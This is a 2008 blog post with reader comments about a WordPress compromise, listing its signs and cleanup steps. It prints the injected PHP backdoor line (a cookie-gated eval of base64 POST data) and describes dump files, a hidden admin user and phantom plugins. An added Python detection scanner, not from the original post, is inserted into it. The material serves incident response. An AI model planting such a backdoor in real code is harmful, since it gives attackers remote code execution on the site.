Has Your WordPress Been Hacked Recently?

By: Sophia Lucero | April 16, 2008

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters and numbers in the hash vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which, when coupled with a text editor, lets you edit a file and reflect these changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same name as an existing file but with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files are executable scripts that, when called from a browser, display a fake “404 Not Found” error, but when called from a script with the matching hash from one of the hacked PHP files, display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain user info dumped from the MySQL database… usernames, emails, passwords, everything. Remove it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels says 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits, but in this particular situation we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize enough how important it is to upgrade immediately. Is it better to keep working themes and plugins at the cost of an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 alone can fix the problem. Remember that when upgrading you are advised to delete the old files first and then upload the new files. If you just upload and overwrite the old files, the added files such as the _new, _old, .pngg, .jpgg, and .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here is the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).
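As an added example, not code from this post or from WordPress, here is a small Python scanner that walks an install for the indicators listed above (the injected first line keyed on an md5 of a cookie, the _new/_old/.pngg/.jpgg/.giff look-alike files, and wp-info.txt dumps) and pulls out-of-tree entries such as ../../tmp paths out of the serialized active_plugins option mentioned in the May 2 update. The suffix list and regex are assumptions drawn from the symptoms described here, and the sample install, hash and plugin list in demo() are constructed.

```python
import os
import re
import tempfile

# Indicators from the post: an injected first line keyed on an md5 of a cookie,
# look-alike copies of PHP files with these suffixes, and dumped wp-info.txt files.
INJECT_RE = re.compile(r"md5\(\$_COOKIE\[[^\]]*\]\)\s*==\s*\W?[0-9a-f]{32}")
SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")

def scan_tree(root):
    """Walk a WordPress install and return sorted (indicator, relative path) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == "wp-info.txt":
                findings.append(("db-dump", rel))
            if name.endswith(SUFFIXES):
                findings.append(("lookalike", rel))
            if name.endswith(".php"):
                with open(path, "r", errors="replace") as fh:
                    first_line = fh.readline()  # the hack only touches line 1
                if INJECT_RE.search(first_line):
                    findings.append(("injected", rel))
    return sorted(findings)

def suspicious_plugins(active_plugins):
    """Return entries of a PHP-serialized active_plugins value that escape wp-content/plugins."""
    entries = re.findall(r's:\d+:"([^"]*)";', active_plugins)
    return [e for e in entries if ".." in e or e.startswith("/") or "themes/" in e]

def demo():
    """Build a constructed sample install in a temp dir and scan it (hash is made up)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "uploads"))
        samples = {  # constructed sample files, not real site content
            "index.php": "<?php if(md5($_COOKIE['_wp_debugger'])=="
                         "\"0123456789abcdef0123456789abcdef\"){ /* backdoor body */ } ?>\n",
            "wp-settings.php": "<?php\n// ordinary core file\n",
            "wp-content/uploads/index_old.php": "<?php /* fake 404 responder */ ?>\n",
            "wp-content/uploads/img.php.jpgg": "<?php /* fake 404 responder */ ?>\n",
            "wp-content/wp-info.txt": "admin\tadmin@example.com\t<password hash>\n",
        }
        for rel, body in samples.items():
            with open(os.path.join(root, *rel.split("/")), "w") as fh:
                fh.write(body)
        return scan_tree(root)
```

Run scan_tree() against the document root of a real site and feed suspicious_plugins() the active_plugins and deactivated_plugins values copied from wp_options in phpMyAdmin.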

Update (June 10): Check out this very helpful post by Donncha O Caoimh.


24 Comments

  1. links for 2008-04-16 « PinoyBlurker @ PinoyBlogoSphere.com Said,

    [...] Has Your WordPress Been Hacked Recently? | WordPress Philippines Published in: [...]

  2. links for 2008-04-16 « PinoyBlogoSphere.com | PhilippineBlogoSphere.com Said,

    [...] Has Your WordPress Been Hacked Recently? | WordPress Philippines [...]

  3. Pinoy Blurker » links for 2008-04-16 Said,

    [...] Has Your WordPress Been Hacked Recently? | WordPress Philippines [...]

  4. Check whether your Wordpress has been hacked : Lazar’s Said,

    [...] suggests hacks initiated very recently. Target: Wordpress platforms. Details and solutions here. Time for [...]

  5. Technical troubles at East Coast Wahines - surf stories, surf reports, forums and blogs. Said,

    [...] If you’re interested you can read more about it here: http://wordpressphilippines.org/blog/has-your-wordpress-been-hacked-recently/ [...]

  6. Avery Said,

    You’ll also want to look and see if you see a reference in the database to plugins that don’t exist. I found (in the wp-options table) a reference to a file in wp-content/themes/classic and a file in ../../../../../../../../../../tmp/ (there were a lot more ../s to make sure they made it to the root directory, I guess). The files referenced seem encoded and are what “changes” the wp version number to display that it’s version 2.5 - who knows WHAT ELSE these phantom plugins do.

    They are only accessible by going to your phpmyadmin interface and looking at the wp-options table entries (you probably can just search your database for plugin and find the entry.) If you have the phantom Wordpress user, the wp-info.txt file - you will likely have this OTHER database change too.


  7. Word Press Exploit - Netpond ? Said,

    [...] affecting a lot of people. So far 1 of my blogs was hit but I’ve got it all fixed, I believe. Has Your WordPress Been Hacked Recently? | WordPress Philippines Serious vulnerability affecting most versions. Please check your files/logs. __________________ [...]

  8. Terry Trippany Said,

    Thanks for this info. I am a web host and ran into an issue upgrading some of my users from 2.5 to 2.5.1. After much research I came across this post and nearly everything on this page was in the troubled installations.
    (including the ../../../../../../../../../../tmp style text in the active plugins).

    After correcting the issues the blogs work fine.

    -Trip


  9. dissidenz.olifani.de » wordpress hacked en masse Said,

    [...] along. this problem has now been discovered and discussed in the wordpress support forum. this blog lays out a sensible to-do list of immediate measures. also very helpful is the most recent [...]

  10. Advantages of upgrading WP? - Webforumet.no - Webmaster forum Said,

    [...] massive hacker attack against a heap of wp blogs in the past week, and this applies to most versions: Has Your WordPress Been Hacked Recently? | WordPress Philippines Personally I’m holding off a bit before I upgrade to newer versions on several blogs. Otherwise [...]

  11. Another Hacker « Shamus Writes Said,

    [...] forums and didn’t find anything useful for awhile – until I came across a link to this blog entry detailing the symptoms of a known hacker and how to look for and clean up after him.  Sure [...]

  12. Themepress » Have you upgraded to Wordpress 2.5.1 yet? Said,

    [...] you haven’t, then you might want to get cracking. As written in this article “Has your Wordpress been hacked recently”, a very invasive hack is showing up on more and more Wordpress installations. The key to entry [...]

  13. What Andy Saw » Blog Archive » Blog Attack! Said,

    [...] If you’re running your blog on WordPress, checkout Has Your Wordpress Been Hacked Recently? [...]

  14. hummel Said,

    I was hacked in this way: somebody edited my wp-db.php files and added hundreds of links in it (to get backlinks to their sites).
    I found it out in this way:
    once I saw some strange folder full of some files in my ftp account (not a directory related to wp blogs) and deleted it. Next day I opened my blog and it said error on some line in wp-db.php file. I checked this file and that named line was to include those links - apparently when I deleted that folder that line went broken and my blog got down. Deleted that line and everything ok.
    Anybody had the same experience, what could it be?

  15. How I fixed the WP 2.5.1 upgrade issue Said,

    [...] has written a good overview and guide to check whether your blog has been hacked or not over at WordPress Philippines. Gave it a good read and used it like a checklist in my investigation to root out and solve this [...]

  16. Webloggin - Blog Archive » Wordpress 2.5.1 Upgrade Failure May Be Linked to Hack/Exploit Said,

    [...] people were having the same error. Well it turns out that my blogs had been somewhat hacked by an exploit that is detailed here. The exploit creates phantom users, phantom plugins and modifies some core files to allegedly get [...]

  17. Blendor » Wordpress Automatic Upgrade plugin Said,

    [...] it’s linked from the Wordpress.org instructions for upgrading. It’s also a good idea to check if you’ve been hacked . The older versions have a vulnerability that allows exposure of admin passwords and [...]

  18. WP bug solved: ‘WordPress 2.5.1 is available! Please update now’ : Make Money Online, Stocks, Forex, Mutual Funds Philippines Said,

    [...] Wordpress support topic and a post in WordpressPhilippines.org were the most helpful with regard to this problem. The info below shows what I did with our [...]

  19. Hiatus & WordPress 2.5.1 » JaypeeOnline // Blogging News & Reviews Said,

    [...] out this post from WordPress Philippines that talks about the recent WordPress vulnerability/hack in [...]

  20. Michael Said,

    WP Security Scan Plugin:
    http://semperfiwebdesign.com/custom-applications/wp-security-scan/


  21. Into the Woods » So I have been hacked Said,

    [...] again (because I already lost it once) my Google pagerank, but I would tell everyone to give this a read and check whether it isn’t happening to you too… better to prevent than to cure :P [...]

  22. temp » Blog Archive » pwned Said,

    [...] We got caught by a nasty Wordpress vulnerability and we’re in the process of restoring content and getting back to normal.  Please be [...]

  23. More WordPress blogs being hacked | WordPress Philippines Said,

    [...] time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, [...]

  24. Eugen J Said,

    Also check: http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/ in addition to Donncha O Caoimh article.
